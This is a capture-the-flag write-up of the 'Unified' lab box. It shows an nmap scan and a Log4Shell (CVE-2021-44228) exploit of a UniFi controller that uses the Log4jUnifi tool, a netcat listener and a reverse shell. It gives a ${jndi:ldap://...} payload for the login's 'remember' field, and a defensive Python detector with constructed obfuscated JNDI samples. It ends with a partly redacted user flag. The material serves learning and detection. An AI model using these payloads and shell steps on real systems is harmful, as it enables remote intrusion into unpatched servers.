Unified

Personal Rating: Easy

Enumeration

Running an extensive nmap scan shows quite a lot (I cut out most of the unneeded output):

sudo nmap -p- -sC -sV <IP>

PORT     STATE    SERVICE         REASON         VERSION
22/tcp   open     ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp filtered ibm-db2-admin   no-response
8080/tcp open     http-proxy      syn-ack ttl 63
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.129.104.243:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open     ssl/nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York
| Subject Alternative Name: DNS:UniFi
| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
<SNIP>

The machine seems to be a UniFi AP, and I am presented with a login page when navigating to the IP on port 8443 in the browser. The default credentials ubnt:ubnt did not work. I found the Metasploit module multi/http/ubiquiti_unifi_log4shell, but it did not work.

Discovering Log4Shell

Researching the version of the service, I found out it should be vulnerable to Log4Shell.

https://pythonawesome.com/exploiting-cve-2021-44228-in-unifi-network-application-for-remote-code-execution-and-more/

yay openjdk #chose (jre11 openjdk)

sudo pacman -S maven #chose (jre11)

sudo pacman -S python-pip

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi && cd Log4jUnifi && pip install -r requirements.txt

mvn package -f utils/rogue-jndi/

sudo pacman -S docker

git clone https://aur.archlinux.org/docker-git.git
cd docker-git
makepkg -sri

systemctl start docker

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi
mv Log4jUnifi log4junifi
cd log4junifi
sudo docker build -t log4junifi .

nc -lnvp 4444 #In a separate terminal

sudo docker run -it -v $(pwd)/loot:/log4junifi/loot -p 8090:8090 -p 1389:1389 log4junifi -u https://10.129.104.243:8443 -i 10.10.16.4 -p 4444

This way I could get a shell on the system. Obviously this is the script-kiddie way, as I used a prepared rogue JNDI server by someone else, but learning to do everything manually did not fit my time plans for this box.

I later found out that I also could have injected a payload of the format ${jndi:ldap://{tun0 IP address}/whatever} into the "remember" field on the login page, which would have made things a lot easier.
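From the defender's side, the interesting point in the two paragraphs above is that the controller logged an attacker-controlled login field through Log4j, so the same ${jndi:...} string the box accepts is exactly what a detection rule on login bodies and access logs should flag. The block below is an added example (not code from this writeup, from Log4jUnifi, or from the UniFi controller) that scans constructed sample events for JNDI lookups: JSON bodies are walked field by field so a hit names the field (here "remember"), values are URL-decoded, and nested ${...} lookups are flattened the way Log4j's own substitutor would before matching, because a plain "${jndi:" string match misses wrapped forms. The IP 198.51.100.7, the sample log lines and the JSON bodies are all constructed for the example. Detection like this is a compensating control only; the fix for CVE-2021-44228 is upgrading the controller to a patched release.

```python
"""Detect Log4Shell-style JNDI lookup strings in untrusted input and logs.

Added example for this writeup; not code from the Log4jUnifi project or the
UniFi controller. All sample events below are constructed."""
import json
import re
from urllib.parse import unquote

# Constructed sample events: two UniFi-style JSON login bodies and two
# access-log lines (198.51.100.7 is a documentation-range placeholder).
SAMPLE_EVENTS = [
    '{"username":"admin","password":"x","remember":"${jndi:ldap://198.51.100.7:1389/o}","strict":true}',
    '{"username":"admin","password":"x","remember":false,"strict":true}',
    '10.0.0.5 - - [10/Jan/2022:10:00:00 +0000] "GET /manage HTTP/1.1" 302 0 "-" "${${lower:j}ndi:rmi://198.51.100.7/x}"',
    '10.0.0.6 - - [10/Jan/2022:10:00:01 +0000] "GET /manage HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: a body containing no further '$', '{' or '}'.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# URI schemes Log4j's JndiLookup hands to the JNDI layer.
_JNDI = re.compile(r"jndi:(?:ldaps?|rmi|dns|iiop|corba|nis|nds):", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup body the way Log4j's substitutor would for
    the stateless lookups: ':-' default values and lower/upper case conversion.
    Any other lookup is replaced by its literal body so the text stays inspectable."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    return body


def normalize(text: str, max_rounds: int = 16) -> str:
    """URL-decode, then collapse nested ${...} lookups innermost-first until the
    text stops changing (the round limit bounds pathological input)."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = _INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def _strings_in(value, path=""):
    """Yield (json_path, string) pairs for every string inside a parsed JSON value."""
    if isinstance(value, str):
        yield path or "$", value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield from _strings_in(v, f"{path}.{k}" if path else k)
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from _strings_in(v, f"{path}[{i}]")


def scan_event(event: str):
    """Return a list of (field, normalized_text) findings for one event.
    JSON bodies are walked field by field so the finding names the field
    (e.g. 'remember'); anything else is treated as one opaque log line."""
    try:
        fields = list(_strings_in(json.loads(event)))
    except ValueError:
        fields = [("raw", event)]
    findings = []
    for field, text in fields:
        norm = normalize(text)
        # After normalization a lookup reads 'jndi:<scheme>:...' whether or
        # not it was wrapped, so one pattern covers both shapes.
        if _JNDI.search(norm):
            findings.append((field, norm))
    return findings


def scan_events(events):
    """Map event index -> findings, skipping clean events."""
    return {i: f for i, e in enumerate(events) if (f := scan_event(e))}


if __name__ == "__main__":
    for idx, hits in scan_events(SAMPLE_EVENTS).items():
        for field, norm in hits:
            print(f"event {idx}: JNDI lookup in {field!r}: {norm}")
```

Run against the constructed events, only the first login body (field "remember") and the third log line are reported; the second body, whose "remember" is a boolean, and the fourth line are clean. Matching after normalization rather than before is the design choice that matters: the raw string of the third event never contains "${jndi:".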

cat /home/michael/user.txt
6ced<SNIP>a127
